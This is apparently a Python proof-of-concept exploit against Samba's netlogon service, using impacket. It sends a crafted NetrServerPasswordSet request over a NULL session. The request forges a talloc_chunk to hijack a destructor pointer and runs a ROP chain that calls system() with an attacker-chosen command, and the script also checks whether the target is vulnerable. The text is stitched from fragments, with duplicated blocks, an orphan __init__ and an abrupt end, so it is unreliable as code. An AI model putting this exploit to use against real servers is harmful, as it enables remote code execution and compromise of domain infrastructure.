def __init__(self):
self.target = None
self.dce = None
sessionKey = '\x00'*16
# prepare ServerPasswordSet request
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
authenticator['Timestamp'] = 10
uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()
uasNewPass['Data'] = '\x00'*16
self.serverName = nrpc.PLOGONSRV_HANDLE()
# ReferentID field of PrimaryName controls the uninitialized value of creds
self.serverName.fields['ReferentID'] = 0
self.accountName = WSTR()
request = Requester.NetrServerPasswordSet()
request['PrimaryName'] = self.serverName
request['AccountName'] = self.accountName
request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
request['ComputerName'] = '\x00'
request['Authenticator'] = authenticator
request['UasNewPassword'] = uasNewPass
self.request = request
def exploit(free_addr, pie=0, destructor=-1, step=0x80):
pivot = pie + pivot_o
pop4ret = pie + pop4ret_o
popebx = pie + popebx_o
got = pie + got_o
fmt = pie + fmt_o
system = pie + system_o
snprintf = pie + snprintf_o
bss = pie + bss_o
if pie != 0:
destructor = pivot
# struct talloc_chunk {
# struct talloc_chunk *next, *prev;
# struct talloc_chunk *parent, *child;
# struct talloc_reference_handle *refs; // refs = 0
# talloc_destructor_t destructor; // destructor = -1: (No Crash), others: controled EIP
# const char *name;
# size_t size;
# unsigned flags; // magic
# void *poo
# };
talloc_chunk = l32(0) # refs => 0
talloc_chunk += l32(destructor) # destructor => control EIP
talloc_chunk += l32(pop4ret) # pop4ret
talloc_chunk += 'leet' #
talloc_chunk += l32(0xe8150c70) # flags => magic
# ebx => got
rop = l32(popebx) + l32(got)
# write cmd to bss
for i in xrange(len(cmd)):
c = cmd[i]
rop += l32(snprintf) + l32(pop4ret)
rop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c))
# system(cmd)
rop += l32(system) + 'leet' + l32(bss)
payload = 'deadbeef'
payload += talloc_chunk * 0x1000 * step
payload += 'leet' * 2
payload += rop.ljust(2560, 'C')
payload += 'cafebabe' + '\0'
username = ''
password = ''
###
# impacket does not implement NetrServerPasswordSet
###
# 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)
class NetrServerPasswordSet(NDRCALL):
opnum = 6
structure = (
('PrimaryName', nrpc.PLOGONSRV_HANDLE),
('AccountName', WSTR),
('SecureChannelType', nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
('ComputerName', WSTR),
('Authenticator', nrpc.NETLOGON_AUTHENTICATOR),
('UasNewPassword', nrpc.ENCRYPTED_NT_OWF_PASSWORD),
)
class NetrServerPasswordSetResponse(NDRCALL):
structure = (
('ReturnAuthenticator', nrpc.NETLOGON_AUTHENTICATOR),
('ErrorCode', NTSTATUS),
)
nrpc.OPNUMS[6] = (NetrServerPasswordSet, NetrServerPasswordSetResponse)
###
# connect to target
###
rpctransport = transport.DCERPCTransportFactory(
r'ncacn_np:%s[\PIPE\netlogon]' % host)
rpctransport.set_credentials('', '') # NULL session
rpctransport.set_dport(port)
# impacket has a problem with SMB2 dialect against samba4
# force to 'NT LM 0.12' only
rpctransport.preferred_dialect('NT LM 0.12')
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
sessionKey = '\x00' * 16
###
# prepare ServerPasswordSet request
###
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
'12345678', sessionKey)
authenticator['Timestamp'] = 10
uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()
uasNewPass['Data'] = payload
primaryName = nrpc.PLOGONSRV_HANDLE()
# ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
primaryName.fields['ReferentID'] = free_addr
request = NetrServerPasswordSet()
request['PrimaryName'] = primaryName
request['AccountName'] = username + '\x00'
request[
'SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
request['ComputerName'] = host + '\x00'
request['Authenticator'] = authenticator
request['UasNewPassword'] = uasNewPass
DCERPCSessionError = nrpc.DCERPCSessionError
try:
resp = dce.request(request)
print("no error !!! error code: 0xc0000225 or 0xc0000034 is expected")
print("seems not vulnerable")
# resp.dump()
dce.disconnect()
return 2
except DCERPCSessionError as e:
# expect error_code: 0xc0000225 - STATUS_NOT_FOUND
# expect error_code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND
print("seems not vulnerable")
# resp.dump()
dce.disconnect()
return 2
except impacket.nmb.NetBIOSError as e:
# print 'exception occured'
if e.args[0] == 'Error while reading from remote':
# print("connection lost!!!\nmight be vulnerable")
return 1
else:
raise
except AttributeError:
# print("exception")
return 0
###
#resp = nrpc.hNetrServerReqChallenge(dce, NULL, target + '\x00', '12345678')
#resp.dump()
#serverChallenge = resp['ServerChallenge']
#sessionKey = nrpc.ComputeSessionKeyStrongKey(password, '12345678', serverChallenge, None)
sessionKey = '\x00' * 16
###
# prepare ServerPasswordSet request
###
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
'12345678', sessionKey)
authenticator['Timestamp'] = 10
uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()
uasNewPass['Data'] = '\x00' * 16
primaryName = nrpc.PLOGONSRV_HANDLE()
# ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
primaryName.fields['ReferentID'] = 0x41414141
request = NetrServerPasswordSet()
request['PrimaryName'] = primaryName
request['AccountName'] = username + 'a\x00'
request[
'SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
request['ComputerName'] = target + '\x00'
request['Authenticator'] = authenticator
request['UasNewPassword'] = uasNewPass